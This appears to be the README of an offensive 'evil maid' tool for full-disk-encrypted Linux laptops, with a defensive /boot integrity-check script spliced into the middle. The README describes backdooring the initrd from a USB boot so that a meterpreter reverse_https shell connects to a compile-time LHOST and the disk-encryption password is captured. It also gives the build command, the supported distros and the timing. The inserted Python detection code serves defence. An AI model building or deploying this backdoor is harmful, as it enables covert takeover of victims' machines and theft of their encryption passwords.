Scenario

Laptop left turned off with FDE turned on

Attacker boots from USB/CD/Network

Script executes and backdoors initrd

User returns to laptop, boots as normal

Backdoored initrd loads:
(Debian/Ubuntu/Kali) the .so file into /sbin/init on boot, dropping a shell.
(Fedora/CentOS) an LD_PRELOAD .so via DefaultEnvironment, loaded globally, dropping a shell.
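A defender-side check for the tampering the scenario above describes (added example, not part of this project): it compares the unencrypted /boot artefacts against a known-good SHA-256 manifest and flags systemd DefaultEnvironment lines that inject LD_PRELOAD. The file names, contents, hashes and the system.conf fragment are constructed for the demo.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def check_boot_manifest(boot_dir, manifest):
    """Compare {name: sha256 hex} against boot_dir; returns (name, ok|modified|missing)."""
    results = []
    for name, expected in manifest.items():
        p = Path(boot_dir) / name
        if not p.is_file():
            results.append((name, "missing"))
        elif sha256_file(p) != expected:
            results.append((name, "modified"))
        else:
            results.append((name, "ok"))
    return results

def systemd_preload_hits(system_conf_text):
    """Return DefaultEnvironment= lines (systemd system.conf) that set LD_PRELOAD."""
    hits = []
    for line in system_conf_text.splitlines():
        s = line.strip()
        if s.startswith("DefaultEnvironment=") and "LD_PRELOAD=" in s:
            hits.append(s)
    return hits

# Constructed system.conf fragment; the .so path is a placeholder, not a real artefact.
SAMPLE_SYSTEM_CONF = """[Manager]
#DefaultEnvironment=
DefaultEnvironment=LD_PRELOAD=/usr/lib/EXAMPLE_backdoor.so
"""

def demo():
    """Constructed /boot: record a baseline, overwrite the initrd, re-check."""
    with tempfile.TemporaryDirectory() as d:
        boot = Path(d)
        (boot / "initrd.img-example").write_bytes(b"constructed initrd contents")
        (boot / "vmlinuz-example").write_bytes(b"constructed kernel image")
        manifest = {n: sha256_file(boot / n) for n in ("initrd.img-example", "vmlinuz-example")}
        (boot / "initrd.img-example").write_bytes(b"constructed initrd contents + hook")
        return check_boot_manifest(boot, manifest)

if __name__ == "__main__":
    print(demo(), systemd_preload_hits(SAMPLE_SYSTEM_CONF))
```

Because the attacker in this scenario has offline write access to /boot, keep the manifest off the laptop (or anchor it in a measured boot); a baseline stored next to the initrd can be rewritten along with it.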

Supported Distros

Ubuntu 14.04.3

Debian 8.2.0

Kali 2.0

Fedora 23

CentOS 7

Current Features

python/meterpreter/reverse_https to the compile-time LHOST

FDE decryption password stored in the meterpreter environment (getenv PASSWORD)

Details

Compiling

See the Makefile for more information and configuration. LHOST is required in the environment to build the .so, as msfvenom is piped in at compile time. It is also necessary to have libcryptsetup-dev (or the equivalent package) installed on the build machine.

Generic instructions (builds the ISO image in the cwd): LHOST=192.168.56.101 make rev.so iso

The following options have been appended to the kernel boot:

mc superuser nodhcp quiet loglevel=0

Furthermore, the prompt value has been set to 0 to allow fully automated execution.

Timing

Approximate nefarious boot -> backdoored time: ~2 minutes
Approximate legit boot -> shell: ~90 seconds (configurable; we want networking up before us)

Prerequisites

core.d is an unpacked core.gz from TinyCore with the below packages merged in.

Core-current is an unpacked Core-current.iso

The following packages have been installed inside TinyCore (python, filesystem support):